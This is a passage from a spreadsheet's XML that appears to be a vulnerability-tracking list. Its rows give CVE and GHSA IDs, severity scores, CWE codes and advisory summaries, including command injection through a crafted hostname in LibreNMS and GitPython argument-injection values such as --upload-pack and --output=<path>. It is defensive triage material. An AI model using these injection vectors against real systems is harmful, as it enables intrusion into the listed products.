      <c r="Q529" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R529" s="5" t="inlineStr">
        <is>
          <t>Improper authentication in Microsoft Authenticator allows an unauthorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S529" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80097</t>
        </is>
      </c>
    </row>
    <row r="530">
      <c r="A530" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B530" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C530" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81525</t>
        </is>
      </c>
      <c r="D530" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E530" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F530" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G530" s="5" t="inlineStr"/>
      <c r="H530" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I530" s="5" t="inlineStr"/>
      <c r="J530" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K530" s="5" t="inlineStr"/>
      <c r="L530" s="5" t="inlineStr">
        <is>
          <t>composer:mongodb/mongodb</t>
        </is>
      </c>
      <c r="M530" s="5" t="inlineStr">
        <is>
          <t>1.21.4, 2.4.1</t>
        </is>
      </c>
      <c r="N530" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O530" s="5" t="inlineStr"/>
      <c r="P530" s="5" t="inlineStr"/>
      <c r="Q530" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="R530" s="5" t="inlineStr">
        <is>
          <t>### Impact
Passing untrusted input as part of a database or collection name may result in targeting a different database or collection than specified.
### Patches
Fixed in PHP library 1.21.4 and 2.4.1.
### Workarounds
Validate database and collection names prior to passing into APIs.</t>
        </is>
      </c>
      <c r="S530" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81525</t>
        </is>
      </c>
    </row>
    <row r="531">
      <c r="A531" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B531" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C531" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82304</t>
        </is>
      </c>
      <c r="D531" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E531" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F531" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G531" s="5" t="inlineStr"/>
      <c r="H531" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I531" s="5" t="inlineStr"/>
      <c r="J531" s="5" t="inlineStr"/>
      <c r="K531" s="5" t="inlineStr"/>
      <c r="L531" s="5" t="inlineStr"/>
      <c r="M531" s="5" t="inlineStr"/>
      <c r="N531" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O531" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P531" s="5" t="inlineStr"/>
      <c r="Q531" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R531" s="5" t="inlineStr">
        <is>
          <t>The Music Store  WordPress plugin before 1.4.5 does not sanitise and escape user input before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.</t>
        </is>
      </c>
      <c r="S531" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82304</t>
        </is>
      </c>
    </row>
    <row r="532">
      <c r="A532" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B532" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C532" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82684</t>
        </is>
      </c>
      <c r="D532" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E532" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F532" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G532" s="5" t="inlineStr"/>
      <c r="H532" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I532" s="5" t="inlineStr"/>
      <c r="J532" s="5" t="inlineStr"/>
      <c r="K532" s="5" t="inlineStr"/>
      <c r="L532" s="5" t="inlineStr"/>
      <c r="M532" s="5" t="inlineStr"/>
      <c r="N532" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O532" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P532" s="5" t="inlineStr"/>
      <c r="Q532" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R532" s="5" t="inlineStr">
        <is>
          <t>Tycon Systems TPDIN-Monitor-WEB3 versions 2.2.9 and prior are vulnerable to a Missing Authorization vulnerability. This could allow an attacker to extract system credentials, configurations, or flash contents.</t>
        </is>
      </c>
      <c r="S532" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82684</t>
        </is>
      </c>
    </row>
    <row r="533">
      <c r="A533" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B533" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C533" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82712</t>
        </is>
      </c>
      <c r="D533" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E533" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F533" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G533" s="5" t="inlineStr"/>
      <c r="H533" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I533" s="5" t="inlineStr"/>
      <c r="J533" s="5" t="inlineStr"/>
      <c r="K533" s="5" t="inlineStr"/>
      <c r="L533" s="5" t="inlineStr"/>
      <c r="M533" s="5" t="inlineStr"/>
      <c r="N533" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O533" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P533" s="5" t="inlineStr"/>
      <c r="Q533" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="R533" s="5" t="inlineStr">
        <is>
          <t>Tycon Systems TPDIN-Monitor-WEB3 versions 2.2.9 and prior are vulnerable to a cross-site request forgery vulnerability. This could allow an attacker to perform state changing operations on the device.</t>
        </is>
      </c>
      <c r="S533" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82712</t>
        </is>
      </c>
    </row>
    <row r="534">
      <c r="A534" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B534" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C534" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84194</t>
        </is>
      </c>
      <c r="D534" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E534" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F534" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G534" s="5" t="inlineStr"/>
      <c r="H534" s="5" t="n">
        <v>0.014</v>
      </c>
      <c r="I534" s="5" t="inlineStr"/>
      <c r="J534" s="5" t="inlineStr"/>
      <c r="K534" s="5" t="inlineStr"/>
      <c r="L534" s="5" t="inlineStr"/>
      <c r="M534" s="5" t="inlineStr"/>
      <c r="N534" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O534" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P534" s="5" t="inlineStr"/>
      <c r="Q534" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R534" s="5" t="inlineStr">
        <is>
          <t>LibreNMS versions &gt;= 23.10.0 and &lt; 26.2.0 (fixed in 26.4.0) contain an authenticated OS command injection vulnerability in libvirt discovery. When libvirt support is enabled (enable_libvirt=true), the device hostname ($this-&gt;getDevice()-&gt;hostname) is concatenated into shell commands (ssh, virsh list/dumpxml/domstate) in VminfoLibvirt.php and passed to exec() without escapeshellarg() or argument separation. An authenticated admin can set a crafted device hostname to inject arbitrary OS commands, leading to remote code execution in the discovery worker context.</t>
        </is>
      </c>
      <c r="S534" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84194</t>
        </is>
      </c>
    </row>
    <row r="535">
      <c r="A535" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B535" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C535" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84203</t>
        </is>
      </c>
      <c r="D535" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E535" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F535" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G535" s="5" t="inlineStr"/>
      <c r="H535" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I535" s="5" t="inlineStr"/>
      <c r="J535" s="5" t="inlineStr"/>
      <c r="K535" s="5" t="inlineStr"/>
      <c r="L535" s="5" t="inlineStr"/>
      <c r="M535" s="5" t="inlineStr"/>
      <c r="N535" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O535" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P535" s="5" t="inlineStr"/>
      <c r="Q535" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="R535" s="5" t="inlineStr">
        <is>
          <t>Memos versions 0.26.0 through 0.30.0 fail to revoke refresh tokens when a user changes their password, allowing attackers to maintain account access. An attacker with a stolen refresh token can call the RefreshToken RPC to obtain new access tokens and rotate the refresh token indefinitely, bypassing the password change security measure.</t>
        </is>
      </c>
      <c r="S535" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84203</t>
        </is>
      </c>
    </row>
    <row r="536">
      <c r="A536" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B536" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C536" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84452</t>
        </is>
      </c>
      <c r="D536" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E536" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F536" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G536" s="5" t="inlineStr"/>
      <c r="H536" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I536" s="5" t="inlineStr"/>
      <c r="J536" s="5" t="inlineStr"/>
      <c r="K536" s="5" t="inlineStr"/>
      <c r="L536" s="5" t="inlineStr">
        <is>
          <t>pip:winml-cli</t>
        </is>
      </c>
      <c r="M536" s="5" t="inlineStr">
        <is>
          <t>0.4.0</t>
        </is>
      </c>
      <c r="N536" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O536" s="5" t="inlineStr"/>
      <c r="P536" s="5" t="inlineStr"/>
      <c r="Q536" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-942</t>
        </is>
      </c>
      <c r="R536" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="S536" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84452</t>
        </is>
      </c>
    </row>
    <row r="537">
      <c r="A537" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B537" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C537" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85388</t>
        </is>
      </c>
      <c r="D537" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E537" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F537" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G537" s="5" t="inlineStr"/>
      <c r="H537" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I537" s="5" t="inlineStr"/>
      <c r="J537" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="K537" s="5" t="inlineStr"/>
      <c r="L537" s="5" t="inlineStr"/>
      <c r="M537" s="5" t="inlineStr"/>
      <c r="N537" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O537" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P537" s="5" t="inlineStr"/>
      <c r="Q537" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R537"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S537" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85388</t>
        </is>
      </c>
    </row>
    <row r="538">
      <c r="A538" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B538" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C538" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86167</t>
        </is>
      </c>
      <c r="D538" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E538" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F538" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G538" s="5" t="inlineStr"/>
      <c r="H538" s="5" t="n">
        <v>0.016</v>
      </c>
      <c r="I538" s="5" t="inlineStr"/>
      <c r="J538" s="5" t="inlineStr"/>
      <c r="K538" s="5" t="inlineStr"/>
      <c r="L538" s="5" t="inlineStr"/>
      <c r="M538" s="5" t="inlineStr"/>
      <c r="N538" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O538" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="P538" s="5" t="inlineStr"/>
      <c r="Q538" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="R538" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in Tenda HG10 300001138. Impacted is the function formgponConf of the file /boaform/admin/formgponConf of the component Boa. The manipulation of the argument fmgpon_loid leads to os command injection. Remote exploitation of the attack is possible. The exploit is publicly available and might be used.</t>
        </is>
      </c>
      <c r="S538" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86167</t>
        </is>
      </c>
    </row>
    <row r="539">
      <c r="A539" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B539" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C539" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86185</t>
        </is>
      </c>
      <c r="D539" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E539" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F539" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G539" s="5" t="inlineStr"/>
      <c r="H539" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I539" s="5" t="inlineStr"/>
      <c r="J539" s="5" t="inlineStr"/>
      <c r="K539" s="5" t="inlineStr"/>
      <c r="L539" s="5" t="inlineStr"/>
      <c r="M539" s="5" t="inlineStr"/>
      <c r="N539" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O539" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P539" s="5" t="inlineStr"/>
      <c r="Q539" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="R539" s="5" t="inlineStr">
        <is>
          <t>Bilibili Desktop through 1.18.0 disables TLS certificate verification process-wide and executes unsigned remote JavaScript configuration without integrity checks. An attacker in an on-path network position can intercept configuration fetches, inject arbitrary JavaScript executed in the renderer with access to the privileged IPC bridge, and execute system commands or steal login credentials.</t>
        </is>
      </c>
      <c r="S539" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86185</t>
        </is>
      </c>
    </row>
    <row r="540">
      <c r="A540" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B540" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C540" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86509</t>
        </is>
      </c>
      <c r="D540" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E540" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F540" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G540" s="5" t="inlineStr"/>
      <c r="H540" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I540" s="5" t="inlineStr"/>
      <c r="J540" s="5" t="inlineStr"/>
      <c r="K540" s="5" t="inlineStr"/>
      <c r="L540" s="5" t="inlineStr"/>
      <c r="M540" s="5" t="inlineStr"/>
      <c r="N540" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O540" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P540" s="5" t="inlineStr"/>
      <c r="Q540" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-121</t>
        </is>
      </c>
      <c r="R540" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in D-Link DIR-895L A1_102b07. This impacts the function sendOffer/sendACK of the file udhcpcd/serverpacket.c of the component udhcpcd. This manipulation causes stack-based buffer overflow. The attack can only be done within the local network. The exploit has been published and may be used.</t>
        </is>
      </c>
      <c r="S540" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86509</t>
        </is>
      </c>
    </row>
    <row r="541">
      <c r="A541" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B541" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C541" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86510</t>
        </is>
      </c>
      <c r="D541" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E541" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F541" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G541" s="5" t="inlineStr"/>
      <c r="H541" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I541" s="5" t="inlineStr"/>
      <c r="J541" s="5" t="inlineStr"/>
      <c r="K541" s="5" t="inlineStr"/>
      <c r="L541" s="5" t="inlineStr"/>
      <c r="M541" s="5" t="inlineStr"/>
      <c r="N541" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O541" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P541" s="5" t="inlineStr"/>
      <c r="Q541" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-787</t>
        </is>
      </c>
      <c r="R541" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in D-Link DIR-822A A_101. Affected is the function tunnel_set_params of the component L2TP Control Message Parser. Such manipulation leads to out-of-bounds write. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.</t>
        </is>
      </c>
      <c r="S541" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86510</t>
        </is>
      </c>
    </row>
    <row r="542">
      <c r="A542" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B542" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C542" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86712</t>
        </is>
      </c>
      <c r="D542" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E542" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F542" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G542" s="5" t="inlineStr"/>
      <c r="H542" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I542" s="5" t="inlineStr"/>
      <c r="J542" s="5" t="inlineStr"/>
      <c r="K542" s="5" t="inlineStr"/>
      <c r="L542" s="5" t="inlineStr"/>
      <c r="M542" s="5" t="inlineStr"/>
      <c r="N542" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O542" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P542" s="5" t="inlineStr"/>
      <c r="Q542" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R542"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S542" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86712</t>
        </is>
      </c>
    </row>
    <row r="543">
      <c r="A543" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B543" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C543" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86722</t>
        </is>
      </c>
      <c r="D543" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E543" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F543" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G543" s="5" t="inlineStr"/>
      <c r="H543" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I543" s="5" t="inlineStr"/>
      <c r="J543" s="5" t="inlineStr"/>
      <c r="K543" s="5" t="inlineStr"/>
      <c r="L543" s="5" t="inlineStr"/>
      <c r="M543" s="5" t="inlineStr"/>
      <c r="N543" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O543" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P543" s="5" t="inlineStr"/>
      <c r="Q543" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R543"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S543" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86722</t>
        </is>
      </c>
    </row>
    <row r="544">
      <c r="A544" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B544" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C544" s="5" t="inlineStr">
        <is>
          <t>GHSA-4vpg-pfj8-m33q</t>
        </is>
      </c>
      <c r="D544" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E544" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F544" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G544" s="5" t="inlineStr"/>
      <c r="H544" s="5" t="inlineStr"/>
      <c r="I544" s="5" t="inlineStr"/>
      <c r="J544" s="5" t="inlineStr"/>
      <c r="K544" s="5" t="inlineStr"/>
      <c r="L544" s="5" t="inlineStr">
        <is>
          <t>pip:gitpython</t>
        </is>
      </c>
      <c r="M544" s="5" t="inlineStr"/>
      <c r="N544" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O544" s="5" t="inlineStr"/>
      <c r="P544" s="5" t="inlineStr"/>
      <c r="Q544" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="R544" s="5" t="inlineStr">
        <is>
          <t>## Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-956x-8gvw-wg5v. This link is maintained to preserve external references.
## Original Description
GitPython before 3.1.51 fails to guard against dangerous Git options passed as keyword arguments in Repo.archive() and git.ls_remote(), allowing command injection via options such as --exec/--upload-pack (leading to arbitrary command execution). Additionally, Repo.iter_commits() and Repo.blame() do not check for leading-dash revision arguments, so a revision like --output=&lt;path&gt; can cause Git to open and truncate an arbitrary file. Exploitation requires an application that passes attacker-controlled arguments to these methods.</t>
        </is>
      </c>
      <c r="S544" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-4vpg-pfj8-m33q</t>
        </is>
      </c>
    </row>
    <row r="545">
      <c r="A545" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B545" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C545" s="5" t="inlineStr">
        <is>
          <t>GHSA-crmc-f4m7-33fj</t>
        </is>
      </c>
      <c r="D545" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E545" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F545" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G545" s="5" t="inlineStr"/>
      <c r="H545" s="5" t="inlineStr"/>
      <c r="I545" s="5" t="inlineStr"/>
      <c r="J545" s="5" t="inlineStr"/>
      <c r="K545" s="5" t="inlineStr"/>
      <c r="L545" s="5" t="inlineStr">
        <is>
          <t>pip:gitpython</t>
        </is>
      </c>
      <c r="M545" s="5" t="inlineStr"/>
      <c r="N545" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O545" s="5" t="inlineStr"/>
      <c r="P545" s="5" t="inlineStr"/>
      <c r="Q545" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="R545" s="5" t="inlineStr">
        <is>
          <t>## Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-7833-fr7j-v32q. This link is maintained to preserve external references.
## Original Description
GitPython before 3.1.59 fails to disable merge_includes when parsing .gitmodules, allowing attackers to disclose local file content by including arbitrary file paths via [include] directives. Attackers can craft a malicious .gitmodules file with include directives pointing to sensitive files; when repo.submodules is accessed, GitConfigParser raises MissingSectionHeaderError embedding the target file's first line verbatim in the exception message.</t>
        </is>
      </c>
      <c r="S545" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-crmc-f4m7-33fj</t>
        </is>
      </c>
    </row>
    <row r="546">
      <c r="A546" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B546" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C546" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16233</t>
        </is>
      </c>
      <c r="D546" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E546" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F546" s="5" t="inlineStr">
        <is>
          <t>security@ni.com</t>
        </is>
      </c>
      <c r="G546" s="5" t="inlineStr"/>
      <c r="H546" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I546" s="5" t="inlineStr"/>
      <c r="J546" s="5" t="inlineStr"/>
      <c r="K546" s="5" t="inlineStr">
        <is>
          <t>ni:labview</t>
        </is>
      </c>
      <c r="L546" s="5" t="inlineStr"/>
      <c r="M546" s="5" t="inlineStr"/>
      <c r="N546" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O546" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P546" s="5" t="inlineStr"/>
      <c r="Q546" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R546"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S546" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16233</t>
        </is>
      </c>
    </row>
    <row r="547">
      <c r="A547" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B547" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C547" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16234</t>
        </is>
      </c>
      <c r="D547" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E547" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F547" s="5" t="inlineStr">
        <is>
          <t>security@ni.com</t>
        </is>
      </c>
      <c r="G547" s="5" t="inlineStr"/>
      <c r="H547" s="5" t="n">
